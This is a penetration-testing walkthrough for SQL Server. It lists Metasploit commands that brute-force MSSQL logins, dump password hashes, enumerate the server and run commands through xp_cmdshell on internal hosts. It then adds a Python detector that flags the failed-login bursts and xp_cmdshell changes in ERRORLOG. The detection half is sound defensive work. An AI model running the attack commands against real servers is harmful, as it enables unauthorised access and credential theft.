1. Collect the servers on the internal network that have port 1433 open:
For this step, refer to this article: https://www.cnblogs.com/xiehong/p/12502100.html
2. Start penetration testing the servers with port 1433 open:
2.1 Use msf to brute-force port 1433: 192.168.10.251
(1)use auxiliary/scanner/mssql/mssql_login
(2)set RHOSTS 192.168.109.139
(3)set USER_FILE /home/xh/shentou/usr_mysql.txt
(4)set PASS_FILE /home/xh/shentou/pwd_mysql.txt
(5)run
2.2 Find/capture the server's passwords
(1)use auxiliary/scanner/mssql/mssql_hashdump
(2)set RHOSTS 192.168.10.251
(3)set PASSWORD 123456
(4)run

2.3 Browse MSSQL
(1)use auxiliary/admin/mssql/mssql_enum
(2)set RHOSTS 192.168.10.236
(3)set PASSWORD 123456
(4)run
2.4 Reload the xp_cmd function
(1)use auxiliary/admin/mssql/mssql_exec
(2)set CMD 'ipconfig'
(3)set RHOSTS 192.168.10.251
(4)set PASSWORD 123456
(5)run
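From the defender's side, the activity in steps 2.1 and 2.4 leaves traces in the SQL Server ERRORLOG: a burst of "Login failed for user" messages from one client, followed by the "Configuration option 'xp_cmdshell' changed from 0 to 1" message when xp_cmdshell is re-enabled. The detector below is an added example, not part of the original page; the log lines it parses are constructed samples in the standard ERRORLOG format, and the threshold and window values are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample ERRORLOG lines (not from the original page). The
# "Error: 18456" line that normally precedes each failed login is omitted.
def _fail(ts, user, ip):
    return (f"{ts} Logon       Login failed for user '{user}'. "
            f"Reason: Password did not match that for the login provided. [CLIENT: {ip}]")

SAMPLE_LOG = "\n".join(
    [_fail(f"2024-03-01 10:00:0{i}.00", "sa", "10.0.0.7") for i in range(6)]  # brute-force burst
    + [_fail("2024-03-01 10:00:20.00", "sa", "10.0.0.9")]                        # single typo-style failure
    + ["2024-03-01 10:00:30.00 spid55      Configuration option 'xp_cmdshell' "
       "changed from 0 to 1. Run the RECONFIGURE statement to install."]
)

TS = r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2})"
LOGIN_FAIL = re.compile(TS + r" Logon\s+Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<ip>[^\]]+)\]")
XP_CMDSHELL = re.compile(TS + r" \S+\s+Configuration option 'xp_cmdshell' changed from (?P<old>\d) to (?P<new>\d)")

def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")

def detect(log_text, threshold=5, window_seconds=60):
    """Return alerts: (\"brute_force\", ip, user, count) when a client accumulates
    `threshold` failed logins inside a sliding window (assumed values), and
    (\"xp_cmdshell_enabled\", timestamp) when xp_cmdshell is switched on."""
    alerts = []
    failures = defaultdict(list)   # client ip -> timestamps of recent failures
    flagged = set()                # alert once per client
    for line in log_text.splitlines():
        m = LOGIN_FAIL.match(line)
        if m:
            ip, ts = m.group("ip"), parse_ts(m.group("ts"))
            bucket = failures[ip]
            bucket.append(ts)
            while bucket and ts - bucket[0] > timedelta(seconds=window_seconds):
                bucket.pop(0)  # drop failures that fell out of the window
            if len(bucket) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append(("brute_force", ip, m.group("user"), len(bucket)))
            continue
        m = XP_CMDSHELL.match(line)
        if m and m.group("new") == "1":
            alerts.append(("xp_cmdshell_enabled", m.group("ts")))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The same two patterns can be pulled from SQL Server audit or Windows Application log events instead of the ERRORLOG file; only the regexes change.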
